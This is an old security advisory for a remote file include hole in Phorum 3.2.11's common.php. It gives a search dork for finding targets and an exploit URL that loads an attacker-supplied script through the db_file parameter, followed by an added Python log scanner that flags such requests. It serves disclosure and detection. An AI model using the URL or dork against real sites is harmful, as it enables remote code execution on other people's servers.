# Title : Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
# Published : 2006-12-06
# Author : Mr-m07
===========================================================
Yee7TeaM
WwW.Yee7.CoM
===========================================================
Software: Phorum v3.2.11
Vendor: http://www.phorum.org/
Download: http://skrypty.webpc.pl/pobierz274.html
Dork: "Copyright (C) 2000 Phorum Development Team" and back from doc folder :)
Description:
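Line 31 of common.php:

    // $db_file = './db/postgresql65.php';

The default assignment is commented out, so the script itself never sets $db_file; where request parameters are imported as global variables (for example with register_globals on), the db_file parameter in the request sets it instead.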
Exploit: http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]
===========================================================
By: Mr-m07
Thanx To: ShockShadow & AL-SHIKH
WwW.Yee7.CoM
===========================================================
# www.Syue.com [2006-12-06]
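
For detection, the request pattern above can be looked for in web server access logs. The following is an added example, not part of the original advisory: it assumes combined-format access logs, and the sample log lines, addresses and host names are constructed. It flags every request to common.php that carries a db_file parameter, since a configuration variable has no reason to arrive in a request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Dec/2006:10:01:02 +0000] "GET /forum/common.php'
    '?db_file=http%3A%2F%2Fhost.invalid%2Fa.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [06/Dec/2006:10:02:10 +0000] "GET /forum/common.php'
    '?db_file=%2Fvar%2Ftmp%2Fa.php HTTP/1.1" 200 498',
    '192.0.2.4 - - [06/Dec/2006:10:03:00 +0000] "GET /forum/index.php?f=1 HTTP/1.1" 200 9001',
    '192.0.2.4 - - [06/Dec/2006:10:03:05 +0000] "GET /forum/common.php HTTP/1.1" 200 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]+:', re.I)  # http:, ftp:, php:, data: ...


def classify(value):
    """Label a decoded db_file value; any value at all is unexpected."""
    v = value.strip()
    if SCHEME_RE.match(v) or v.startswith('//'):
        return 'remote-or-wrapper'      # URL or stream wrapper
    if '\x00' in v or '..' in v or v.startswith('/'):
        return 'local-path'             # absolute path or traversal
    return 'parameter-present'          # still worth a look


def scan(lines):
    """Return (client_ip, label, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith('/common.php'):
            continue
        # parse_qs percent-decodes once, as the server does
        for value in parse_qs(url.query, keep_blank_values=True).get('db_file', []):
            hits.append((line.split()[0], classify(value), value))
    return hits


if __name__ == '__main__':
    for ip, label, value in scan(SAMPLE_LOG):
        print(f'{ip}\t{label}\t{value}')
```

Access logs record only the query string, so a db_file value sent in a POST body or cookie will not show up here and needs request-body logging or a WAF rule.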